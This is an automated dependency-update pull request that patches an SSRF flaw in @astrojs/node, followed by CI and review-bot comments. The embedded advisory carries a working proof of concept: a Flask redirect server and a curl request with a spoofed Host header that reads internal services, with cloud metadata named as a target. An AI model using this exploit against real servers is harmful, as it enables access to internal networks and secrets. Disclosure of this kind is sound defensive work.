chore(deps): update dependency @astrojs/node to v9.5.4 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@astrojs/node (source)	9.5.2 → 9.5.4

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-25545

Summary

Server-Side Rendered pages that return an error with a prerendered custom error page (eg. 404.astro or 500.astro) are vulnerable to SSRF. If the Host: header is changed to an attacker's server, it will be fetched on /500.html and they can redirect this to any internal URL to read the response body through the first request.

Details

The following line of code fetches statusURL and returns the response back to the client:

https://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534

statusURL comes from this.baseWithoutTrailingSlash, which is built from the Host: header. prerenderedErrorPageFetch() is just fetch(), and follows redirects. This makes it possible for an attacker to set the Host: header to their server (eg. Host: attacker.tld), and if the server still receives the request without normalization, Astro will now fetch http://attacker.tld/500.html.

The attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.

Looking at the vulnerable code, the way to reach this is if the renderError() function is called (error response during SSR) and the error page is prerendered (custom 500.astro error page). The PoC below shows how a basic project with these requirements can be set up.

Note: Another common vulnerable pattern for 404.astro we saw is:

return new Response(null, {status: 404});

Also, it does not matter what allowedDomains is set to, since it only checks the X-Forwarded-Host: header.

https://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146

PoC

1. Create a new empty project

npm create astro@latest poc -- --template minimal --install --no-git --yes

2. Create poc/src/pages/error.astro which throws an error with SSR:

---
export const prerender = false;

throw new Error("Test")
---

3. Create poc/src/pages/500.astro with any content like:

<p>500 Internal Server Error</p>

4. Build and run the app

cd poc
npx astro add node --yes
npm run build && npm run preview

5. Set up an "internal server" which we will SSRF to. Create a file called ssrf.txt and host it locally on http://localhost:8000:

cd $(mktemp -d)
echo "SECRET CONTENT" > ssrf.txt
python3 -m http.server

6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:

# pip install Flask
from flask import Flask, redirect

app = Flask(__name__)

@​app.route("/500.html")
def exploit():
    return redirect("http://127.0.0.1:8000/ssrf.txt")

if __name__ == "__main__":
    app.run()

7. Send the following request to the server, and notice the 500 error returns "SECRET CONTENT".

$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'
HTTP/1.1 500 OK
content-type: text/plain
date: Tue, 03 Feb 2026 09:51:28 GMT
last-modified: Tue, 03 Feb 2026 09:51:09 GMT
server: SimpleHTTP/0.6 Python/3.12.3
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

SECRET CONTENT

Impact

An attacker who can access the application without Host: header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.

For this to be vulnerable, a common feature needs to be used, with direct access to the server (no proxies).

---

Release Notes

withastro/astro (@​astrojs/node)

v9.5.4

Compare Source

Patch Changes

• #​15564 522f880 Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15572 ef851bf Thanks @​matthewp! - Upgrade astro package support

  astro@​5.17.3 includes a fix to prevent Action payloads from exhausting memory. @​astrojs/node now depends on this version of Astro as a minimum requirement.

v9.5.3

Compare Source

Patch Changes

• c13b536 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[changeset-bot]

⚠️ No Changeset found

Latest commit: 8b37bf8

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

[nx-cloud]

View your CI Pipeline Execution ↗ for commit 8b37bf8

Command	Status	Duration	Result
nx affected --targets=test:sherif,test:knip,tes...	✅ Succeeded	4m 13s	View ↗
nx run-many --target=build --exclude=examples/*...	✅ Succeeded	1s	View ↗

---

☁️ Nx Cloud last updated this comment at 2026-02-24 10:55:59 UTC

[coderabbitai]

Important

Review skipped

Review was skipped due to path filters

⛔ Files ignored due to path filters (1)

• pnpm-lock.yaml is excluded by !**/pnpm-lock.yaml

CodeRabbit blocks several paths by default. You can override this behavior by explicitly including those paths in the path filters. For example, including **/dist/** will override the default block on the dist directory, by removing the pattern from both the lists.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

• 🔍 Trigger review

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch renovate/npm-astrojs-node-vulnerability

---

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[pkg-pr-new]

More templates

• @tanstack/query-example-angular-auto-refetching
• @tanstack/query-example-angular-basic
• @tanstack/query-example-angular-basic-persister
• @tanstack/query-example-angular-devtools-panel
• @tanstack/query-example-angular-infinite-query-with-max-pages
• @tanstack/query-example-angular-optimistic-updates
• @tanstack/query-example-angular-pagination
• @tanstack/query-example-angular-query-options-from-a-service
• @tanstack/query-example-angular-router
• @tanstack/query-example-angular-rxjs
• @tanstack/query-example-angular-simple
• @tanstack/query-example-preact-simple
• @tanstack/query-example-react-algolia
• @tanstack/query-example-react-auto-refetching
• @tanstack/query-example-react-basic
• @tanstack/query-example-react-basic-graphql-request
• @tanstack/query-example-chat
• @tanstack/query-example-react-default-query-function
• @tanstack/query-example-react-devtools-panel
• @tanstack/query-example-eslint-legacy
• @tanstack/query-example-react-infinite-query-with-max-pages
• @tanstack/query-example-react-load-more-infinite-scroll
• @tanstack/query-example-react-nextjs
• @tanstack/query-example-react-nextjs-app-prefetching
• @tanstack/query-example-nextjs-suspense-streaming
• @tanstack/query-example-react-offline
• @tanstack/query-example-react-optimistic-updates-cache
• @tanstack/query-example-react-optimistic-updates-ui
• @tanstack/query-example-react-pagination
• @tanstack/query-example-react-playground
• @tanstack/query-example-react-prefetching
• @tanstack/query-example-react-react-native
• @tanstack/query-example-react-router
• @tanstack/query-example-react-rick-morty
• @tanstack/query-example-react-shadow-dom
• @tanstack/query-example-react-simple
• @tanstack/query-example-react-star-wars
• @tanstack/query-example-react-suspense
• @tanstack/query-example-solid-astro
• @tanstack/query-example-solid-basic
• @tanstack/query-example-solid-basic-graphql-request
• @tanstack/query-example-solid-default-query-function
• @tanstack/query-example-solid-simple
• @tanstack/query-example-solid-start-streaming
• @tanstack/query-example-svelte-auto-refetching
• @tanstack/query-example-svelte-basic
• @tanstack/query-example-svelte-load-more-infinite-scroll
• @tanstack/query-example-svelte-optimistic-updates
• @tanstack/query-example-svelte-playground
• @tanstack/query-example-svelte-simple
• @tanstack/query-example-svelte-ssr
• @tanstack/query-example-svelte-star-wars
• @tanstack/query-example-vue-2.6-basic
• @tanstack/query-example-vue-2.7-basic
• @tanstack/query-example-vue-basic
• @tanstack/query-example-vue-dependent-queries
• @tanstack/query-example-vue-nuxt3
• @tanstack/query-example-vue-persister
• @tanstack/query-example-vue-simple

@tanstack/angular-query-experimental

npm i https://pkg.pr.new/@tanstack/angular-query-experimental@10183

@tanstack/eslint-plugin-query

npm i https://pkg.pr.new/@tanstack/eslint-plugin-query@10183

@tanstack/preact-query

npm i https://pkg.pr.new/@tanstack/preact-query@10183

@tanstack/query-async-storage-persister

npm i https://pkg.pr.new/@tanstack/query-async-storage-persister@10183

@tanstack/query-broadcast-client-experimental

npm i https://pkg.pr.new/@tanstack/query-broadcast-client-experimental@10183

@tanstack/query-core

npm i https://pkg.pr.new/@tanstack/query-core@10183

@tanstack/query-devtools

npm i https://pkg.pr.new/@tanstack/query-devtools@10183

@tanstack/query-persist-client-core

npm i https://pkg.pr.new/@tanstack/query-persist-client-core@10183

@tanstack/query-sync-storage-persister

npm i https://pkg.pr.new/@tanstack/query-sync-storage-persister@10183

@tanstack/react-query

npm i https://pkg.pr.new/@tanstack/react-query@10183

@tanstack/react-query-devtools

npm i https://pkg.pr.new/@tanstack/react-query-devtools@10183

@tanstack/react-query-next-experimental

npm i https://pkg.pr.new/@tanstack/react-query-next-experimental@10183

@tanstack/react-query-persist-client

npm i https://pkg.pr.new/@tanstack/react-query-persist-client@10183

@tanstack/solid-query

npm i https://pkg.pr.new/@tanstack/solid-query@10183

@tanstack/solid-query-devtools

npm i https://pkg.pr.new/@tanstack/solid-query-devtools@10183

@tanstack/solid-query-persist-client

npm i https://pkg.pr.new/@tanstack/solid-query-persist-client@10183

@tanstack/svelte-query

npm i https://pkg.pr.new/@tanstack/svelte-query@10183

@tanstack/svelte-query-devtools

npm i https://pkg.pr.new/@tanstack/svelte-query-devtools@10183

@tanstack/svelte-query-persist-client

npm i https://pkg.pr.new/@tanstack/svelte-query-persist-client@10183

@tanstack/vue-query

npm i https://pkg.pr.new/@tanstack/vue-query@10183

@tanstack/vue-query-devtools

npm i https://pkg.pr.new/@tanstack/vue-query-devtools@10183

commit: 8b37bf8

[github-actions]

size-limit report 📦

Path	Size
react full	11.92 KB (0%)
react minimal	8.95 KB (0%)